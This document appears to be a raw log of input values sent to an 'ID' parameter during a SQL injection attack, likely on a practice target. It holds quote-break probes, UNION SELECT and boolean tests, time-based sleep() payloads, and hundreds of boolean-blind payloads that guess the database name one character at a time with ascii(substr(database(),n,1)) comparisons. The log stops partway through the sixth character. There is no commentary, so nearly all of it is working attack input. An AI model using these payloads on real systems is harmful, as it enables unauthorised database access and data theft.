ID:1
ID:10
ID:-1' union select 1,2,3 -- 
ID:1'
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1'
ID:1'-- 
ID:1 and 1=1
ID:1 and 1=2
ID:-1 and 1=1
ID:-1 or 1=1
ID:1' and '1
ID:1' and '1
ID:1' and '1=2
ID:1'
ID:1'-- 
ID:1"-- 
ID:1" union select 1,database(),3-- 
ID:-1" union select 1,database(),3-- 
ID:1" if((length (database()) >5),sleep(10)<1)-- 
ID:1" and if((length (database()) >5),sleep(10)<1)-- 
ID:1" and if((length (database()) >5),sleep(10),1)-- 
ID:1" and if((length database()) >5,sleep(10),1)-- 
ID:1" and if((length (database())) >5,sleep(10),1)-- 
ID:2
ID:2"-- 
ID:2" and 1=2-- 
ID:2" and 1=2
ID:2" and 1=2
ID:2' and 1=2
ID:2' and 1=1
ID:2'
ID:2"
ID:2')
ID:2')-- 
ID:2') and 1=2-- 
ID:1') and ascii(length(database()))>50-- 
ID:1') and ascii(length(database()))>50 -- 
ID:1') and1=1 -- 
ID:1') and 1=1 -- 
ID:1') and  ascii(length(database()))>50 -- 
ID:1') and  ascii(length(database()))>50 ;-- 
ID:1') and  length(database())>50 ;-- 
ID:1') and  length(database())<50 ;-- 
ID:1') and  length(database())<8;-- 
ID:1') and  length(database())<9;-- 
ID:1') and  length(database())<10;-- 
ID:1') and  length(database())<11;-- 
ID:1') and  length(database())<11;-- 
ID:1')and ascii(substr((select database()),1,1))=97 #
ID:1')and ascii(substr((select database()),1,1))=98 #
ID:1')and ascii(substr((select database()),1,1))=99 #
ID:1')and ascii(substr((select database()),1,1))=100 #
ID:1')and ascii(substr((select database()),1,1))=101 #
ID:1')and ascii(substr((select database()),1,1))=102 #
ID:1')and ascii(substr((select database()),1,1))=103 #
ID:1') and  length(database())<11;-- 
ID:1')and ascii(substr((select database()),1,1))=104 #
ID:1')and ascii(substr((select database()),1,1))=105 #
ID:1')and ascii(substr((select database()),1,1))=106 #
ID:1')and ascii(substr((select database()),1,1))=107 #
ID:1')and ascii(substr((select database()),1,1))=108 #
ID:1')and ascii(substr((select database()),1,1))=109 #
ID:1')and ascii(substr((select database()),1,1))=110 #
ID:1')and ascii(substr((select database()),1,1))=111 #
ID:1')and ascii(substr((select database()),1,1))=112 #
ID:1')and ascii(substr((select database()),1,1))=113 #
ID:1')and ascii(substr((select database()),1,1))=114 #
ID:1')and ascii(substr((select database()),1,1))=115 #
ID:1')and ascii(substr((select database()),1,1))=116 #
ID:1') and  length(database())<11;-- 
ID:1')and ascii(substr((select database()),1,1))=117 #
ID:1')and ascii(substr((select database()),1,1))=118 #
ID:1')and ascii(substr((select database()),1,1))=119 #
ID:1')and ascii(substr((select database()),1,1))=120 #
ID:1')and ascii(substr((select database()),1,1))=121 #
ID:1')and ascii(substr((select database()),1,1))=122 #
ID:1')and ascii(substr((select database()),1,1))=48 #
ID:1')and ascii(substr((select database()),1,1))=49 #
ID:1')and ascii(substr((select database()),1,1))=50 #
ID:1')and ascii(substr((select database()),1,1))=51 #
ID:1')and ascii(substr((select database()),1,1))=52 #
ID:1')and ascii(substr((select database()),1,1))=53 #
ID:1')and ascii(substr((select database()),1,1))=54 #
ID:1')and ascii(substr((select database()),1,1))=55 #
ID:1')and ascii(substr((select database()),1,1))=56 #
ID:1')and ascii(substr((select database()),1,1))=57 #
ID:1')and ascii(substr((select database()),1,1))=65 #
ID:1')and ascii(substr((select database()),1,1))=66 #
ID:1')and ascii(substr((select database()),1,1))=67 #
ID:1')and ascii(substr((select database()),1,1))=68 #
ID:1')and ascii(substr((select database()),1,1))=69 #
ID:1')and ascii(substr((select database()),1,1))=70 #
ID:1')and ascii(substr((select database()),1,1))=71 #
ID:1')and ascii(substr((select database()),1,1))=72 #
ID:1')and ascii(substr((select database()),1,1))=73 #
ID:1')and ascii(substr((select database()),1,1))=74 #
ID:1')and ascii(substr((select database()),1,1))=75 #
ID:1')and ascii(substr((select database()),1,1))=76 #
ID:1')and ascii(substr((select database()),1,1))=77 #
ID:1')and ascii(substr((select database()),1,1))=78 #
ID:1')and ascii(substr((select database()),1,1))=79 #
ID:1')and ascii(substr((select database()),1,1))=80 #
ID:1')and ascii(substr((select database()),1,1))=81 #
ID:1')and ascii(substr((select database()),1,1))=82 #
ID:1')and ascii(substr((select database()),1,1))=83 #
ID:1')and ascii(substr((select database()),1,1))=84 #
ID:1')and ascii(substr((select database()),1,1))=85 #
ID:1')and ascii(substr((select database()),1,1))=86 #
ID:1')and ascii(substr((select database()),1,1))=87 #
ID:1')and ascii(substr((select database()),1,1))=88 #
ID:1')and ascii(substr((select database()),1,1))=89 #
ID:1')and ascii(substr((select database()),1,1))=90 #
ID:1')and ascii(substr((select database()),2,1))=97 #
ID:1')and ascii(substr((select database()),2,1))=98 #
ID:1')and ascii(substr((select database()),2,1))=99 #
ID:1')and ascii(substr((select database()),2,1))=100 #
ID:1')and ascii(substr((select database()),2,1))=101 #
ID:1')and ascii(substr((select database()),2,1))=102 #
ID:1')and ascii(substr((select database()),2,1))=103 #
ID:1')and ascii(substr((select database()),2,1))=104 #
ID:1')and ascii(substr((select database()),2,1))=105 #
ID:1')and ascii(substr((select database()),2,1))=106 #
ID:1')and ascii(substr((select database()),2,1))=107 #
ID:1')and ascii(substr((select database()),2,1))=108 #
ID:1')and ascii(substr((select database()),2,1))=109 #
ID:1')and ascii(substr((select database()),2,1))=110 #
ID:1')and ascii(substr((select database()),2,1))=111 #
ID:1')and ascii(substr((select database()),2,1))=112 #
ID:1')and ascii(substr((select database()),2,1))=113 #
ID:1')and ascii(substr((select database()),2,1))=114 #
ID:1')and ascii(substr((select database()),2,1))=115 #
ID:1')and ascii(substr((select database()),2,1))=116 #
ID:1')and ascii(substr((select database()),2,1))=117 #
ID:1')and ascii(substr((select database()),2,1))=118 #
ID:1')and ascii(substr((select database()),2,1))=119 #
ID:1')and ascii(substr((select database()),2,1))=120 #
ID:1')and ascii(substr((select database()),2,1))=121 #
ID:1')and ascii(substr((select database()),2,1))=122 #
ID:1')and ascii(substr((select database()),2,1))=48 #
ID:1')and ascii(substr((select database()),2,1))=49 #
ID:1')and ascii(substr((select database()),2,1))=50 #
ID:1')and ascii(substr((select database()),2,1))=51 #
ID:1')and ascii(substr((select database()),2,1))=52 #
ID:1')and ascii(substr((select database()),2,1))=53 #
ID:1')and ascii(substr((select database()),2,1))=54 #
ID:1')and ascii(substr((select database()),2,1))=55 #
ID:1')and ascii(substr((select database()),2,1))=56 #
ID:1')and ascii(substr((select database()),2,1))=57 #
ID:1')and ascii(substr((select database()),2,1))=65 #
ID:1')and ascii(substr((select database()),2,1))=66 #
ID:1')and ascii(substr((select database()),2,1))=67 #
ID:1')and ascii(substr((select database()),2,1))=68 #
ID:1')and ascii(substr((select database()),2,1))=69 #
ID:1')and ascii(substr((select database()),2,1))=70 #
ID:1')and ascii(substr((select database()),2,1))=71 #
ID:1')and ascii(substr((select database()),2,1))=72 #
ID:1') and  length(database())<11;-- 
ID:1')and ascii(substr((select database()),2,1))=73 #
ID:1')and ascii(substr((select database()),2,1))=74 #
ID:1')and ascii(substr((select database()),2,1))=75 #
ID:1')and ascii(substr((select database()),2,1))=76 #
ID:1')and ascii(substr((select database()),2,1))=77 #
ID:1')and ascii(substr((select database()),2,1))=78 #
ID:1')and ascii(substr((select database()),2,1))=79 #
ID:1')and ascii(substr((select database()),2,1))=80 #
ID:1')and ascii(substr((select database()),2,1))=81 #
ID:1')and ascii(substr((select database()),2,1))=82 #
ID:1')and ascii(substr((select database()),2,1))=83 #
ID:1')and ascii(substr((select database()),2,1))=84 #
ID:1')and ascii(substr((select database()),2,1))=85 #
ID:1')and ascii(substr((select database()),2,1))=86 #
ID:1')and ascii(substr((select database()),2,1))=87 #
ID:1
ID:1')and ascii(substr((select database()),2,1))=88 #
ID:1')and ascii(substr((select database()),2,1))=89 #
ID:1')and ascii(substr((select database()),2,1))=90 #
ID:1')and ascii(substr((select database()),3,1))=97 #
ID:1')and ascii(substr((select database()),3,1))=98 #
ID:1')and ascii(substr((select database()),3,1))=99 #
ID:1')and ascii(substr((select database()),3,1))=100 #
ID:1')and ascii(substr((select database()),3,1))=101 #
ID:1')and ascii(substr((select database()),3,1))=102 #
ID:1')and ascii(substr((select database()),3,1))=103 #
ID:1')and ascii(substr((select database()),3,1))=104 #
ID:1')and ascii(substr((select database()),3,1))=105 #
ID:1')and ascii(substr((select database()),3,1))=106 #
ID:1')and ascii(substr((select database()),3,1))=107 #
ID:1')and ascii(substr((select database()),3,1))=108 #
ID:1')and ascii(substr((select database()),3,1))=109 #
ID:1')and ascii(substr((select database()),3,1))=110 #
ID:1')and ascii(substr((select database()),3,1))=111 #
ID:1')and ascii(substr((select database()),3,1))=112 #
ID:1')and ascii(substr((select database()),3,1))=113 #
ID:1')and ascii(substr((select database()),3,1))=114 #
ID:1')and ascii(substr((select database()),3,1))=115 #
ID:1')and ascii(substr((select database()),3,1))=116 #
ID:1')and ascii(substr((select database()),3,1))=117 #
ID:1')and ascii(substr((select database()),3,1))=118 #
ID:1')and ascii(substr((select database()),3,1))=119 #
ID:1')and ascii(substr((select database()),3,1))=120 #
ID:1')and ascii(substr((select database()),3,1))=121 #
ID:1')and ascii(substr((select database()),3,1))=122 #
ID:1')and ascii(substr((select database()),3,1))=48 #
ID:1')and ascii(substr((select database()),3,1))=49 #
ID:1')and ascii(substr((select database()),3,1))=50 #
ID:1')and ascii(substr((select database()),3,1))=51 #
ID:1
ID:1')and ascii(substr((select database()),3,1))=52 #
ID:1')and ascii(substr((select database()),3,1))=53 #
ID:1')and ascii(substr((select database()),3,1))=54 #
ID:1')and ascii(substr((select database()),3,1))=55 #
ID:1')and ascii(substr((select database()),3,1))=56 #
ID:1')and ascii(substr((select database()),3,1))=57 #
ID:1')and ascii(substr((select database()),3,1))=65 #
ID:1')and ascii(substr((select database()),3,1))=66 #
ID:1')and ascii(substr((select database()),3,1))=67 #
ID:1')and ascii(substr((select database()),3,1))=68 #
ID:1')and ascii(substr((select database()),3,1))=69 #
ID:1')and ascii(substr((select database()),3,1))=70 #
ID:1')and ascii(substr((select database()),3,1))=71 #
ID:1')and ascii(substr((select database()),3,1))=72 #
ID:1')and ascii(substr((select database()),3,1))=73 #
ID:1')and ascii(substr((select database()),3,1))=74 #
ID:1')and ascii(substr((select database()),3,1))=75 #
ID:1')and ascii(substr((select database()),3,1))=76 #
ID:1')and ascii(substr((select database()),3,1))=77 #
ID:1')and ascii(substr((select database()),3,1))=78 #
ID:1')and ascii(substr((select database()),3,1))=79 #
ID:1')and ascii(substr((select database()),3,1))=80 #
ID:1')and ascii(substr((select database()),3,1))=81 #
ID:1')and ascii(substr((select database()),3,1))=82 #
ID:1')and ascii(substr((select database()),3,1))=83 #
ID:1')and ascii(substr((select database()),3,1))=84 #
ID:1')and ascii(substr((select database()),3,1))=85 #
ID:1')and ascii(substr((select database()),3,1))=86 #
ID:1')and ascii(substr((select database()),3,1))=87 #
ID:1')and ascii(substr((select database()),3,1))=88 #
ID:1')and ascii(substr((select database()),3,1))=89 #
ID:1')and ascii(substr((select database()),3,1))=90 #
ID:1')and ascii(substr((select database()),4,1))=97 #
ID:1')and ascii(substr((select database()),4,1))=98 #
ID:1')and ascii(substr((select database()),4,1))=99 #
ID:1')and ascii(substr((select database()),4,1))=100 #
ID:1')and ascii(substr((select database()),4,1))=101 #
ID:1')and ascii(substr((select database()),4,1))=102 #
ID:1')and ascii(substr((select database()),4,1))=103 #
ID:1')and ascii(substr((select database()),4,1))=104 #
ID:1')and ascii(substr((select database()),4,1))=105 #
ID:1')and ascii(substr((select database()),4,1))=106 #
ID:1')and ascii(substr((select database()),4,1))=107 #
ID:1')and ascii(substr((select database()),4,1))=108 #
ID:1')and ascii(substr((select database()),4,1))=109 #
ID:1')and ascii(substr((select database()),4,1))=110 #
ID:1')and ascii(substr((select database()),4,1))=111 #
ID:1')and ascii(substr((select database()),4,1))=112 #
ID:1')and ascii(substr((select database()),4,1))=113 #
ID:1')and ascii(substr((select database()),4,1))=114 #
ID:1')and ascii(substr((select database()),4,1))=115 #
ID:1')and ascii(substr((select database()),4,1))=116 #
ID:1')and ascii(substr((select database()),4,1))=117 #
ID:1')and ascii(substr((select database()),4,1))=118 #
ID:1')and ascii(substr((select database()),4,1))=119 #
ID:1')and ascii(substr((select database()),4,1))=120 #
ID:1')and ascii(substr((select database()),4,1))=121 #
ID:1')and ascii(substr((select database()),4,1))=122 #
ID:1')and ascii(substr((select database()),4,1))=48 #
ID:1')and ascii(substr((select database()),4,1))=49 #
ID:1')and ascii(substr((select database()),4,1))=50 #
ID:1')and ascii(substr((select database()),4,1))=51 #
ID:1')and ascii(substr((select database()),4,1))=52 #
ID:1')and ascii(substr((select database()),4,1))=53 #
ID:1')and ascii(substr((select database()),4,1))=54 #
ID:1')and ascii(substr((select database()),4,1))=55 #
ID:1')and ascii(substr((select database()),4,1))=56 #
ID:1')and ascii(substr((select database()),4,1))=57 #
ID:1')and ascii(substr((select database()),4,1))=65 #
ID:1')and ascii(substr((select database()),4,1))=66 #
ID:1')and ascii(substr((select database()),4,1))=67 #
ID:1')and ascii(substr((select database()),4,1))=68 #
ID:1')and ascii(substr((select database()),4,1))=69 #
ID:1')and ascii(substr((select database()),4,1))=70 #
ID:1')and ascii(substr((select database()),4,1))=71 #
ID:1')and ascii(substr((select database()),4,1))=72 #
ID:1')and ascii(substr((select database()),4,1))=73 #
ID:1')and ascii(substr((select database()),4,1))=74 #
ID:1')and ascii(substr((select database()),4,1))=75 #
ID:1
ID:1')and ascii(substr((select database()),4,1))=76 #
ID:1')and ascii(substr((select database()),4,1))=77 #
ID:1')and ascii(substr((select database()),4,1))=78 #
ID:1')and ascii(substr((select database()),4,1))=79 #
ID:1')and ascii(substr((select database()),4,1))=80 #
ID:1')and ascii(substr((select database()),4,1))=81 #
ID:1')and ascii(substr((select database()),4,1))=82 #
ID:1')and ascii(substr((select database()),4,1))=83 #
ID:1')and ascii(substr((select database()),4,1))=84 #
ID:1')and ascii(substr((select database()),4,1))=85 #
ID:1')and ascii(substr((select database()),4,1))=86 #
ID:1')and ascii(substr((select database()),4,1))=87 #
ID:1')and ascii(substr((select database()),4,1))=88 #
ID:1')and ascii(substr((select database()),4,1))=89 #
ID:1')and ascii(substr((select database()),4,1))=90 #
ID:1')and ascii(substr((select database()),5,1))=97 #
ID:1')and ascii(substr((select database()),5,1))=98 #
ID:1')and ascii(substr((select database()),5,1))=99 #
ID:1')and ascii(substr((select database()),5,1))=100 #
ID:1')and ascii(substr((select database()),5,1))=101 #
ID:1')and ascii(substr((select database()),5,1))=102 #
ID:1')and ascii(substr((select database()),5,1))=103 #
ID:1')and ascii(substr((select database()),5,1))=104 #
ID:1')and ascii(substr((select database()),5,1))=105 #
ID:1')and ascii(substr((select database()),5,1))=106 #
ID:1')and ascii(substr((select database()),5,1))=107 #
ID:1')and ascii(substr((select database()),5,1))=108 #
ID:1')and ascii(substr((select database()),5,1))=109 #
ID:1')and ascii(substr((select database()),5,1))=110 #
ID:1')and ascii(substr((select database()),5,1))=111 #
ID:1')and ascii(substr((select database()),5,1))=112 #
ID:1')and ascii(substr((select database()),5,1))=113 #
ID:1')and ascii(substr((select database()),5,1))=114 #
ID:1')and ascii(substr((select database()),5,1))=115 #
ID:1')and ascii(substr((select database()),5,1))=116 #
ID:1')and ascii(substr((select database()),5,1))=117 #
ID:1')and ascii(substr((select database()),5,1))=118 #
ID:1')and ascii(substr((select database()),5,1))=119 #
ID:1')and ascii(substr((select database()),5,1))=120 #
ID:1')and ascii(substr((select database()),5,1))=121 #
ID:1')and ascii(substr((select database()),5,1))=122 #
ID:1')and ascii(substr((select database()),5,1))=48 #
ID:1')and ascii(substr((select database()),5,1))=49 #
ID:1')and ascii(substr((select database()),5,1))=50 #
ID:1')and ascii(substr((select database()),5,1))=51 #
ID:1')and ascii(substr((select database()),5,1))=52 #
ID:1')and ascii(substr((select database()),5,1))=53 #
ID:1')and ascii(substr((select database()),5,1))=54 #
ID:1')and ascii(substr((select database()),5,1))=55 #
ID:1')and ascii(substr((select database()),5,1))=56 #
ID:1')and ascii(substr((select database()),5,1))=57 #
ID:1')and ascii(substr((select database()),5,1))=65 #
ID:1')and ascii(substr((select database()),5,1))=66 #
ID:1')and ascii(substr((select database()),5,1))=67 #
ID:1')and ascii(substr((select database()),5,1))=68 #
ID:1')and ascii(substr((select database()),5,1))=69 #
ID:1')and ascii(substr((select database()),5,1))=70 #
ID:1')and ascii(substr((select database()),5,1))=71 #
ID:1')and ascii(substr((select database()),5,1))=72 #
ID:1')and ascii(substr((select database()),5,1))=73 #
ID:1')and ascii(substr((select database()),5,1))=74 #
ID:1')and ascii(substr((select database()),5,1))=75 #
ID:1')and ascii(substr((select database()),5,1))=76 #
ID:1')and ascii(substr((select database()),5,1))=77 #
ID:1')and ascii(substr((select database()),5,1))=78 #
ID:1')and ascii(substr((select database()),5,1))=79 #
ID:1')and ascii(substr((select database()),5,1))=80 #
ID:1')and ascii(substr((select database()),5,1))=81 #
ID:1')and ascii(substr((select database()),5,1))=82 #
ID:1')and ascii(substr((select database()),5,1))=83 #
ID:1')and ascii(substr((select database()),5,1))=84 #
ID:1')and ascii(substr((select database()),5,1))=85 #
ID:1')and ascii(substr((select database()),5,1))=86 #
ID:1')and ascii(substr((select database()),5,1))=87 #
ID:1')and ascii(substr((select database()),5,1))=88 #
ID:1')and ascii(substr((select database()),5,1))=89 #
ID:1')and ascii(substr((select database()),5,1))=90 #
ID:1')and ascii(substr((select database()),6,1))=97 #
ID:1')and ascii(substr((select database()),6,1))=98 #
ID:1')and ascii(substr((select database()),6,1))=99 #
ID:1')and ascii(substr((select database()),6,1))=100 #
ID:1')and ascii(substr((select database()),6,1))=101 #
ID:1
ID:1')and ascii(substr((select database()),6,1))=102 #
ID:1')and ascii(substr((select database()),6,1))=103 #
ID:1')and ascii(substr((select database()),6,1))=104 #
ID:1')and ascii(substr((select database()),6,1))=105 #
ID:1')and ascii(substr((select database()),6,1))=106 #
ID:1')and ascii(substr((select database()),6,1))=107 #
ID:1')and ascii(substr((select database()),6,1))=108 #
ID:1')and ascii(substr((select database()),6,1))=109 #
ID:1')and ascii(substr((select database()),6,1))=110 #
ID:1')and ascii(substr((select database()),6,1))=111 #
ID:1')and ascii(substr((select database()),6,1))=112 #
ID:1')and ascii(substr((select database()),6,1))=113 #
ID:1')and ascii(substr((select database()),6,1))=114 #
ID:1')and ascii(substr((select database()),6,1))=115 #
ID:1')and ascii(substr((select database()),6,1))=116 #
ID:1')and ascii(substr((select database()),6,1))=117 #
ID:1')and ascii(substr((select database()),6,1))=118 #
ID:1')and ascii(substr((select database()),6,1))=119 #
ID:1')and ascii(substr((select database()),6,1))=120 #
ID:1')and ascii(substr((select database()),6,1))=121 #
ID:1')and ascii(substr((select database()),6,1))=122 #
ID:1')and ascii(substr((select database()),6,1))=48 #
ID:1')and ascii(substr((select database()),6,1))=49 #
ID:1')and ascii(substr((select database()),6,1))=50 #
ID:1')and ascii(substr((select database()),6,1))=51 #
ID:1')and ascii(substr((select database()),6,1))=52 #
ID:1')and ascii(substr((select database()),6,1))=53 #
